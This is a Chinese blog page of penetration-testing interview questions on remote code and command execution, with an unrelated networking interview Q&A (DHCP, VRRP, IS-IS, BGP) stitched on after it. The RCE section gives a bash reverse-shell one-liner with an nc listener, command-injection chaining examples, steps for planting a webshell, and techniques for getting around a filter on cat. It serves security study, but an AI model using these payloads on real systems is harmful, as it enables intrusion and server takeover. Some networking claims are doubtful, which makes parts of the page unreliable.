[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)RCE (远程代码/命令执行漏洞)相关面试题
Posted _PowerShell
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)RCE (远程代码/命令执行漏洞)相关面试题相关的知识,希望对你有一定的参考价值。
🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
渗透方向的岗位,涉及到的知识点是很广泛的。
这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞RCE (远程代码/命令执行漏洞)方向的面试题。
如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。
当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(一)SQL注入相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(二)XSS注入相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(三)CSRF相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(四)SSRF相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(五)文件上传相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(六)文件包含相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(七)逻辑漏洞相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(八)暴力破解相关面试题
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(九)XXE 相关面试题
文章目录
- 🍬 博主介绍
- 1、远程命令执行漏洞原理是什么?
- 2、远程代码执行漏洞原理是什么?
- 3、RCE漏洞有什么危害?
- 4、RCE漏洞对你来说有什么作用?
- 5、php能远程执行的函数有哪些?
- 6、能讲一下preg_replace触发漏洞的前提吗?
- 7、能讲一下windows系统命令拼接方式吗?
- 8、能讲一下RCE的防御措施吗?
- 9、你复现过哪些RCE漏洞,你会自己搭建漏洞环境吗?
- 10、一个站点存在RCE漏洞,如何getshell?
- 11、一个站点RCE存在漏洞,怎么利用webshell进行连接?
- 12、你想要查看某个文件,你发现cat被过滤了,怎么办?
1、远程命令执行漏洞原理是什么?
1、一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。
2、比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
3、如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。
4、现在很多的企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。
2、远程代码执行漏洞原理是什么?
1、因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。
2、不管是使用了代码执行的函数,还是使用了不安全的反序列化等等,都可能造成远程代码执行漏洞。
3、如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。
3、RCE漏洞有什么危害?
1、获取服务器权限。
2、获取敏感数据文件。
3、写入恶意文件getshell。
4、植入木马病毒勒索软件。
4、RCE漏洞对你来说有什么作用?
我能利用RCE漏洞,向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
5、php能远程执行的函数有哪些?
1.命令执行的函数:
1. system:执行一个外部的应用程序并显示输出的结果
2. exec:执行一个外部的应用程序
3. shell_exec:执行shell命令并返回输出的结果的字符串
4. passthru:执行一个UNIX系统命令并显示原始的输出
5. popen()
6. proc_popen()
2.代码执行的两个函数:
1.eval(PHP代码)
2.assert(PHP代码)
3.preg_replace
4.call_user_func()和array_map()
6、能讲一下preg_replace触发漏洞的前提吗?
preg_replace函数第一个参数存在e修饰符时,第二个参数和第三个参数可能当作PHP代码被执行。
preg_replace漏洞触发有两个前提:
1、第一个参数需要e标识符,有了它可以执行第二个参数的命令。
2、第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令。
7、能讲一下windows系统命令拼接方式吗?
windows系统命令拼接一般我们是需要用后面的语句来进行攻击,所以首选|,如果被过滤了在考虑其他方式。有如下几种方式:
1.|
管道符,前面命令标准输出,后面命令的标准输入。直接执行后面的语句。
例如:ping 127.0.0.1|whoami直接执行whoami。
2.&
前面的语句为假则执行后面的语句。
例如:commandA & commandB 先运行命令A,然后运行命令B。
3.||
前面的语句执行出错则执行后面的语句。
例如:commandA || commandB 运行命令A,如果失败则运行命令B。
4.&&
前面的语句为假,直接出错,前面的语句为真,执行后面的语句。
例如:commandA && commandB 运行命令A,如果成功则运行命令B。
8、能讲一下RCE的防御措施吗?
1、尽量不要使用命令执行函数。
2、不要让用户控制参数。
3、执行前做好检测和过滤。
9、你复现过哪些RCE漏洞,你会自己搭建漏洞环境吗?
我复现过很多漏洞,一般使用在线复现环境或者使用vulhub漏洞环境,如果找不到漏洞环境我会自己搭建环境。
1、struts2全系列RCE漏洞。
2、solr远程命令执行CVE-2019-17558、CVE-2019-0193。
3、Log4j2远程代码执行漏洞复现cve-2021-44228。
4、Spring Framework远程代码执行漏洞CVE-2022-22965
5、Oracle WebLogic Server远程代码执行CVE-2022-21306
6、JBOSS反序列化漏洞复现CVE-2017-12149、CVE-2017-7504
......
10、一个站点存在RCE漏洞,如何getshell?
反弹shell就行了,我一般使用bash反弹shell,有时候也会用nc或者python。
举例:
本地我采用nc监听
nc -lvvp 端口
远程执行命令
bash -i >& /dev/tcp/本地监听IP/本地监听端口 0>&1
进行exec编码之后就可以远程执行了。
11、一个站点RCE存在漏洞,怎么利用webshell进行连接?
1、找到他的web路径。
2、使用touch命令在web目录创建一个webshell文件。
3、然后使用ehco命令在webshell文件里面写入webshell代码。
4、然后使用chmod命令给文件增加777权限。
5、最后采用菜刀蚁剑等webshell连接工具进行连接。
12、你想要查看某个文件,你发现cat被过滤了,怎么办?
如果只过滤了了cat,有很多绕过方式,我这里随便举几个例子。
1.使用其他命令代替:
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261 //报错出文件内容
2.使用转义符
ca\\t 文件名
3.变量绕过
a=c;b=a;c=t;
$a$b$c 文件名
4.编码进制绕过
如下,先对命令进行编码或者做进制处理,然后再执行。这里我才用了base64编码。
echo 'cat' | base64
`echo 'Y2F0wqAK' | base64 -d` 文件名
[ 数据通信面试篇 ] 数通面试题大集合(详解)
🍬 博主介绍
- 👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
- ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
- 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
- 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
- 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
面试网络方向的岗位,数通知识尤为重要。
这里我总结了200来个面试题,本文讲解第61到第90题30个面试题。
这些问题搞懂了,什么技术支持工程师呀,远程技术支持工程师,网络工程师呀基本上没什么问题了。
当然了,也不只这些岗位会问道这些题,这里只罗列出来了契合的岗位。
目录
61. A连接到一台路由器C,B连接到另一台路由器D,两台路由器相连,A和B的IP地址相同,怎样让他们互相通信?
66. 如果主机配置了静态IP,又通过DHCP获取到一个IP,主机会使用哪一个
67. DHCP中主机一直收不到offer是什么原因,该怎么办?
一、面试题:
61. A连接到一台路由器C,B连接到另一台路由器D,两台路由器相连,A和B的IP地址相同,怎样让他们互相通信?
C上做静态nat,把A的地址转换成CD互联网段的地址ip1
D上做nat server,把B的地址发布到CD互联网段的地址ip2
A访问B时,改为访问IP2,数据经过C时,通过静态nat把源地址转换程ip1,数据经过D时,把目的地址中的ip2转换成B的ip,数据到达B
62. DHCP基本信息
动态主机配置协议,基于UDP运行、端口号为:服务器67,客户机68
63. 主机通过DHCP获取地址的过程
主机发送discover报文,广播寻找服务器,服务器接收到后,发送offer报文,携带预分配的地址、网关、掩码及DNS地址给主机,主机通过ARP检查此地址是否可用,如果不可用则发送decline请求重新分配地址,如果可用则发送Request报文请求配置确认,服务器收到后发送ACK确认报文,主机收到ACK后开始使用地址
64. 主机如何判断地址是否可用
通过发送ARP广播,如果有响应,则该地址已经有人在使用,自己不可用,没有响应则可用
65. 如果网络中有多台DHCP服务器,主机用谁分的地址
主机先收到谁的offer报文就先用谁的
66. 如果主机配置了静态IP,又通过DHCP获取到一个IP,主机会使用哪一个
坑,主机如果设置了静态IP,就无法通过DHCP获取,只能二选一
67. DHCP中主机一直收不到offer是什么原因,该怎么办?
客户机开启了接收过滤器,接收过滤器会进行单播过滤
可以关闭关闭接收过滤器
68. ospf路由重分布的方式
路由引入、下发缺省
69. vrrp作用
主备备份、负载分担备份、解决单点故障,实现业务的平滑过渡
70. vrrp基本信息
虚拟路由冗余协议,基于IP运行,协议号112,组播地址为224.0.0.18
71. vrrp主备网关如何区分
通过优先级,优先级大的成为主网关,优先级一样时看接口IP地址,IP大的成为主
72. vrrp主备如何抢占
如果激活了抢占,则当检测到优先级更高的路由器接入时,该路由器会抢占成为主,其中可以设置抢占时延;
如果没激活抢占,则只要当前主未出现故障,则一直是主,不会被抢占
73. vrrp的报文
advertisement报文,周期性发送,间隔为1s,用于选举主、监视主状态
74. vrrp出现双主的原因
心跳不通:报文在二层不能传递
设置了两个IP地址拥有者
75. isis基本信息
中间系统-中间系统,运行在osi模型中,目前使用的是集成isis,可用于tcp/ip中,
数据链路层协议,链路状态路由协议
76. isis级别
level-1、level-2、level-1-2
77. isis网络实体名称
区域id+系统id+nsel
78. 什么是nsel
用于标识上层协议,当上层协议为IP时,nsel固定为00
79. isis报文
1:IIH(ISIS HELLO)用于建立和维护邻居关系
2:LSP 承载链路状态信息,类似于ospf中的LSA
输入display ISIS lsdb verbose可以查看LSP的详细信息
3:CSNP 完全序列号报文,分为level-1和level-2 两种,包含该设备LSDB中所有的LSP摘要,不同邻居之间交换不同的CSNP,用于确保LSDB的同步,类似于ospf的DD报文
4:PSNP 部分序列号报文,也分两种,只包含部分LSP的摘要信息,主要用于请求LSP更新和对收到的LSP进行确认,类似于ospf中的LSR和LSACK
80. 什么是dis
指定中间系统,主要用于在LAN中虚拟出一个伪节点,并产生伪节点LSP,ISIS设备只需在其洪泛的LSP中描述自己与伪节点的邻居关系即可。
81. 选举dis的作用
减少需要维护的isis邻居数量,减少网络中洪泛的lsp数量
82. 如何使常规区域拥有骨干区域的路由
在level-1-2路由器上执行路由引入,把level-2区域中的路由引入到level-1区域中
83.isis区域划分的要求
所有level-1区域都要通过level1-2路由器接入到level-2区域
必须严格进行网络规划与设计
84. isis与ospf的相比有哪些优势?
1、IS-IS路由协议标准较OSPF更为成熟;IS-IS为OSI标准路由协议,可支持CLNS、IP和IPX等协议,而OSPF只支持IP;
2、IS-IS支持的网络规模比OSPF大;IS-IS支持的最大跳数限制默认值是1024个路由器,而OSPF默认的只有200个。
3、扩展性较好,IS-IS的层次结构与OSPF不同,OSPF是单一的骨干域,而lS-lS可以有多个LEVEL-2 AREA,这可以使骨干扩充更为容易。
4、lS-lS占用网络资源较小,路由收敛和恢复时间更快。IS-IS采用较小的协议数据包承载路由信息,这使得路由信息的繁衍速度更快。
85. ospf中怎样判断一条lsa的新旧
1.通过lsa中的lsa age字段,数值越小越新
2.通过lsa中的lsa seq字段,数值越大越新
86. 如何排除虚假DHCP服务器?
通过DHCP snooping机制,设置信任接口
87. BGP基本信息
边界网关协议、基于TCP运行、端口号179、增强的距离矢量路由协议
88. IGP与EGP
IGP是运行在AS内的路由协议,着重与发现和计算路由,例如:rip、ospf、isis
EGP是运行在AS间的路由协议,着重与路由的传播和选择最优的路由,例如BGP
89. BGP路由更新方式
只发送增量路由
90. BGP报文
open:用于和对等体建立邻居关系,进行能力交互
keepalive:周期性发送,用于维护邻居关系
update:用于在对等体间发送增量路由
notification:当检测到错误时,发送该报文告诉邻居是什么错误,断开连接
route-refresh:用于通知对等体自己支持路由刷新功能
二、专栏分享
每个专栏都在持续更新中~~~
系列文章: [ 数据通信面试篇 ] 数通面试题大集合(一)
以上是关于[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)RCE (远程代码/命令执行漏洞)相关面试题的主要内容,如果未能解决你的问题,请参考以下文章
[ 数据通信面试篇 ] 数通面试题大集合(详解),看完直怼面试官
[ 数据通信面试篇 ] 数通面试题大集合(详解),看完直怼面试官
[ 数据通信面试篇 ] 数通面试题大集合(详解),看完直怼面试官